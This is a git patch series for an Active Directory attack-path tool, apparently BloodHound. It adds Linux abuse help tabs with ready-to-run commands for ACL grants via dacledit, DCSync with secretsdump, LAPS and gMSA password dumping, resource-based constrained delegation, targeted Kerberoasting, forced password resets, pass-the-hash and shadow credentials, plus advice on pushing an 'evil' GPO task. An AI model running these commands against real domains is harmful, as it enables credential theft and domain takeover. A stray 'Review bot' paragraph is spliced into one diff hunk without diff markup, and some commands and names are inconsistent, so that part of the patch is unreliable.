+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

DCSync

+ +

+ The AllExtendedRights privilege grants {sourceName} both the + DS-Replication-Get-Changes and + DS-Replication-Get-Changes-All privileges, which combined + allow a principal to replicate objects from the domain{' '} + {targetName}. +

+ +

+ This can be abused using Impacket's secretsdump.py example script: +

+ +
+                            
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            
+                    
+ +

Retrieve LAPS Passwords

+ +

+ If FullControl (GenericAll) is obtained on the domain, + instead of granting DCSync rights, the AllExtendedRights + privilege included grants {sourceName} enough{' '} + privileges to retrieve LAPS passwords domain-wise. +

+ +

+ LAPSDumper can be used + for that purpose: +

+ +
+                        
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        
+                    
+ + ); + case 'GPO': + return ( + <> +

+ To abuse ownership of a GPO, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

+ With full control of a GPO, you may make modifications + to that GPO which will then apply to the users and + computers affected by the GPO. Select the target object + you wish to push an evil policy down to, then use the + gpedit GUI to modify the GPO, using an evil policy that + allows item-level targeting, such as a new immediate + scheduled task. Then wait at least 2 hours for the group + policy client to pick up and execute the new evil + policy. See the references tab for a more detailed write + up on this abuse`; +

+ +

+ pyGPOAbuse.py can be used for that purpose. +

+ + ); + case 'OU': + return ( + <> +

Control of the Organization Unit

+ +

+ With ownership of the OU object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + case 'Container': + return ( + <> +

Control of the Container

+ +

+ With ownership of the container object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + } +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetName: PropTypes.string, + targetType: PropTypes.string, + targetId: PropTypes.string, + haslaps: PropTypes.bool, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/Owns/Owns.jsx b/src/components/Modals/HelpTexts/Owns/Owns.jsx index 4366f2081..6b56f905c 100644 --- a/src/components/Modals/HelpTexts/Owns/Owns.jsx +++ b/src/components/Modals/HelpTexts/Owns/Owns.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -17,8 +18,8 @@ const Owns = ({ sourceName, sourceType, targetName, targetType, targetId }) => { targetType={targetType} />
- - + { targetId={targetId} /> - + + + + - + diff --git a/src/components/Modals/HelpTexts/Owns/References.jsx b/src/components/Modals/HelpTexts/Owns/References.jsx index 5893873dd..1da4bf6fa 100644 --- a/src/components/Modals/HelpTexts/Owns/References.jsx +++ b/src/components/Modals/HelpTexts/Owns/References.jsx @@ -38,6 +38,14 @@ const References = () => { https://github.com/Kevin-Robertson/Powermad#new-machineaccount +
+ + https://www.thehacker.recipes/ad/movement/dacl/addmember + +
+ + https://www.thehacker.recipes/ad/movement/dacl/grant-rights + ); }; diff --git a/src/components/Modals/HelpTexts/Owns/Abuse.jsx b/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx similarity index 99% rename from src/components/Modals/HelpTexts/Owns/Abuse.jsx rename to src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx index 84850dc5a..abfaf77d8 100644 --- a/src/components/Modals/HelpTexts/Owns/Abuse.jsx +++ b/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ +const WindowsAbuse = ({ sourceName, sourceType, targetName, @@ -912,7 +912,7 @@ const Abuse = ({ } }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetName: PropTypes.string, @@ -921,4 +921,4 @@ Abuse.propTypes = { haslaps: PropTypes.bool, }; -export default Abuse; +export default WindowsAbuse; From 17f2773cf72620ecd971984fc9c9c1a300feff8b Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:39:56 +0100 Subject: [PATCH 22/32] Missing Owns refs --- .../Modals/HelpTexts/Owns/References.jsx | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/src/components/Modals/HelpTexts/Owns/References.jsx b/src/components/Modals/HelpTexts/Owns/References.jsx index 1da4bf6fa..958bb50ca 100644 --- a/src/components/Modals/HelpTexts/Owns/References.jsx +++ b/src/components/Modals/HelpTexts/Owns/References.jsx @@ -43,6 +43,30 @@ const References = () => { https://www.thehacker.recipes/ad/movement/dacl/addmember
+ + https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting + +
+ + https://www.thehacker.recipes/ad/movement/group-policies + +
+ + https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials + +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + +
https://www.thehacker.recipes/ad/movement/dacl/grant-rights From d3d67a8f2e97e844cc83788fcb61e0000b31a1ab Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:40:16 +0100 Subject: [PATCH 23/32] ReadGMSAPassword Linux abuse --- .../HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx | 47 +++++++++++++++++++ .../ReadGMSAPassword/ReadGMSAPassword.jsx | 14 ++++-- .../HelpTexts/ReadGMSAPassword/References.jsx | 4 ++ .../{Abuse.jsx => WindowsAbuse.jsx} | 4 +- 4 files changed, 62 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/ReadGMSAPassword/{Abuse.jsx => WindowsAbuse.jsx} (97%) diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx new file mode 100644 index 000000000..227c5ee86 --- /dev/null +++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx @@ -0,0 +1,47 @@ +import React from "react"; + +const LinuxAbuse = () => { + return ( + <> +

+ There are several ways to abuse the ability to read the GMSA + password. The most straight forward abuse is possible when the + GMSA is currently logged on to a computer, which is the intended + behavior for a GMSA. If the GMSA is logged on to the computer + account which is granted the ability to retrieve the GMSA's + password, simply steal the token from the process running as the + GMSA, or inject into that process. +

+

+ If the GMSA is not logged onto the computer, you may create a + scheduled task or service set to run as the GMSA. The computer + account will start the sheduled task or service as the GMSA, and + then you may abuse the GMSA logon in the same fashion you would + a standard user running processes on the machine (see the + "HasSession" help modal for more details). +

+

+ Finally, it is possible to remotely retrieve the password for + the GMSA and convert that password to its equivalent NT hash. + gMSADumper.py can be used for that purpose. +

+ +
+                
+                    {
+                        "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'"
+                    }
+                
+            
+ +

+ At this point you are ready to use the NT hash the same way you + would with a regular user account. You can perform + pass-the-hash, overpass-the-hash, or any other technique that + takes an NT hash as an input. +

+ + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx index fa86f46e1..7bd2f8d39 100644 --- a/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx +++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const ReadGMSAPassword = ({ targetName={targetName} />
- - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx index 82ba827d5..b57a2d372 100644 --- a/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx +++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx @@ -26,6 +26,10 @@ const References = () => { https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4662 +
+ + https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword + ); }; diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx similarity index 97% rename from src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx rename to src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx index 80dce418d..0cb000bdd 100644 --- a/src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx +++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from "react"; -const Abuse = () => { +const WindowsAbuse = () => { return ( <>

@@ -59,4 +59,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; From 7ca242cfaa2efc88627ff615c1c470741599428a Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:40:32 +0100 Subject: [PATCH 24/32] ReadLAPSPassword Linux abuse --- .../HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx | 37 +++++++++++++++++++ .../ReadLAPSPassword/ReadLAPSPassword.jsx | 14 ++++--- .../HelpTexts/ReadLAPSPassword/References.jsx | 3 ++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +-- 4 files changed, 52 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/ReadLAPSPassword/{Abuse.jsx => WindowsAbuse.jsx} (93%) diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx new file mode 100644 index 000000000..aecd018e9 --- /dev/null +++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx @@ -0,0 +1,37 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType }) => { + return ( + <> +

+ Sufficient control on a computer object is abusable when + the computer's local admin account credential is + controlled with LAPS. The clear-text password for + the local administrator account is stored in an + extended attribute on the computer object called + ms-Mcs-AdmPwd. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                
+                    {
+                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                    }
+                
+            
+ + ); +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx index 905a3b938..8cdf4e1a7 100644 --- a/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx +++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const ReadLAPSPassword = ({ targetName={targetName} />
- - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx index 2b5cd229a..252f59fb7 100644 --- a/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx +++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx @@ -10,6 +10,9 @@ const References = () => { https://adsecurity.org/?p=3164 + + https://www.thehacker.recipes/ad/movement/dacl/readlapspassword + ); }; diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx similarity index 93% rename from src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx rename to src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx index 366699937..8cb245668 100644 --- a/src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx +++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>

@@ -40,9 +40,9 @@ const Abuse = ({ sourceName, sourceType }) => { ); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From a79a71124e35809eb9b5f0e4c3c3ac6ee94aaeee Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:40:47 +0100 Subject: [PATCH 25/32] WriteAccountRestrictions Linux abuse --- .../WriteAccountRestrictions/LinuxAbuse.jsx | 42 +++++++++++++++++++ .../WriteAccountRestrictions/References.jsx | 12 ++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 4 +- .../WriteAccountRestrictions.jsx | 14 ++++--- 4 files changed, 65 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/WriteAccountRestrictions/{Abuse.jsx => WindowsAbuse.jsx} (97%) diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx new file mode 100644 index 000000000..f4469cda1 --- /dev/null +++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx @@ -0,0 +1,42 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+                
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                
+            
+ We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                
+            
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +
+                
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                
+            
+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. + + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx index c158d8c24..40c611c4b 100644 --- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx +++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx @@ -29,6 +29,18 @@ const References = () => { https://github.com/Kevin-Robertson/Powermad#new-machineaccount +
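Review bot: The `addcomputer.py` step only works when the controlled user is permitted to create computer accounts, which this file does not say; the References hunk in this same patch adds the machineaccountquota link, so a sentence such as `Adding a computer account requires the domain's MachineAccountQuota to permit it for the controlled user (see the References tab).` after the first paragraph would close the gap. The placeholders also drift between steps — `'TargetComputer'` in the rbcd.py example versus `cifs/targetcomputer.testlab.local` in the getST.py example — and one spelling throughout would make it clearer they are the same host. Finally, this three-step RBCD text is repeated near-verbatim in the WriteDacl LinuxAbuse file later in the series, where the copy appears to omit the rbcd.py step, so extracting it into a shared snippet, or at least a comment naming the sibling copies, would keep them from diverging.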
+ + https://www.thehacker.recipes/ad/movement/dacl + +
+ + https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + ); }; diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx similarity index 97% rename from src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx rename to src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx index 61e3d6892..0fe766b97 100644 --- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx +++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <> Abusing this primitive is currently only possible through the Rubeus @@ -61,4 +61,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx index 2f3254bf8..5b0033a7e 100644 --- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx +++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const WriteAccountRestrictions = ({ targetName={targetName} />
- - + + - + + + + - + From ec3eb5e601d99b50152897faf77b8b03966ef16c Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:41:00 +0100 Subject: [PATCH 26/32] WriteDacl Linux abuse --- .../Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx | 583 ++++++++++++++++++ .../Modals/HelpTexts/WriteDacl/References.jsx | 36 ++ .../WriteDacl/{Abuse.jsx => WindowsAbuse.jsx} | 6 +- .../Modals/HelpTexts/WriteDacl/WriteDacl.jsx | 20 +- 4 files changed, 637 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/WriteDacl/{Abuse.jsx => WindowsAbuse.jsx} (99%) diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx new file mode 100644 index 000000000..9bb171f05 --- /dev/null +++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx @@ -0,0 +1,583 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ + sourceName, + sourceType, + targetName, + targetType, + targetId, + haslaps, +}) => { + switch (targetType) { + case 'Group': + return ( + <> +

Modifying the rights

+ +

+ To abuse WriteDacl to a group object, you may grant + yourself the AddMember privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

Adding to the group

+ +

+ You can now add members to the group. +

+ +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                        
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                        
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

Cleanup

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ + ); + + case 'User': + return ( + <> +

+ To abuse WriteDacl to a user object, you may grant + yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Targeted Kerberoast

+ +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                        
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        
+                    
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ +

Force Change Password

+ +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                        
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+

+ Now that you know the target user's plain text password, you can + either start a new agent as that user, or use that user's + credentials in conjunction with PowerView's ACL abuse functions, + or perhaps even RDP to a system the target user has access to. + For more ideas and information, see the references tab. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'Computer': + if (haslaps) { + return ( + <> +

+ To abuse WriteDacl to a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Retrieve LAPS Password

+ +

+ Full control of a computer object is abusable when + the computer's local admin account credential is + controlled with LAPS. The clear-text password for + the local administrator account is stored in an + extended attribute on the computer object called + ms-Mcs-AdmPwd. With full control of the computer + object, you may have the ability to read this + attribute, or grant yourself the ability to read the + attribute by modifying the computer object's + security descriptor. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                            
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            
+                        
+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } else { + return ( + <> +

+ To abuse WriteDacl to a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } + case 'Domain': + return ( + <> +

+ To abuse WriteDacl to a domain object, you may grant + yourself the DcSync privileges. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

DCSync

+ +

+ The AllExtendedRights privilege grants {sourceName} both the + DS-Replication-Get-Changes and + DS-Replication-Get-Changes-All privileges, which combined + allow a principal to replicate objects from the domain{' '} + {targetName}. +

+ +

+ This can be abused using Impacket's secretsdump.py example script: +

+ +
+                            
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            
+                    
+ +

Retrieve LAPS Passwords

+ +

+ If FullControl (GenericAll) is obtained on the domain, + instead of granting DCSync rights, the AllExtendedRights + privilege included grants {sourceName} enough{' '} + privileges to retrieve LAPS passwords domain-wise. +

+ +

+ LAPSDumper can be used + for that purpose: +

+ +
+                        
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        
+                    
+ + ); + case 'GPO': + return ( + <> +

+ To abuse WriteDacl to a GPO, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
